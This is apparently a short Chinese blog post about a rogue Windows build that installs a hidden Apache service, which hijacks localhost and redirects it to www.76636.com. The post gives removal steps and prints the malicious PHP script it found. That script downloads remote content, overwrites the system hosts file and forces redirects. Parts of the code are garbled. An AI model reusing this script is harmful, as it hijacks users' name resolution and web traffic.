在一个安装iis的过程中,把网站部署上去之后就发现127.0.0.1或者localhost都会跳转到一个莫名的网站,发现断网之后就是会跳转到一个Http://www.76636.com 类似这种的网站,感叹一句现在流氓软件越来越高级了,我在无意中发现任务管理居然有apache的服务器,我就想你这个蛋,为什么莫名其妙有这个服务启动,还杀不死

解决方案:

使用大数字或者什么管家 禁用apache服务的开机启动,然后重启电脑

然后去C:\WINDOWS\Apache 删掉整个目录 就完美解决了

在C:\WINDOWS\Apache\htdocs目录下一段php脚本,里面这么写的:

<?php
include_once "config.php";
$name1 = "";
$name2 = "";
//$name3 = ""; //获取最新php $index = file_get_contents('http://www.76636.com/ht/index.txt');
if(strpos($index, )
{
$arr = explode("@", $index); $index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
} //获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化 $serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.76636.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.76636.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.76636.com/?3");exit;
break;
default:
header("Location:http://www.76636.com/?4");exit;
break;
} ?>
<meta http-equiv="refresh" content="0;url=http://www.76636.com/?301">

居然有这种跳转,流氓的系统封装强加了一个httpd服务,然后导致127.0.0.1劫持。

05-28 01:51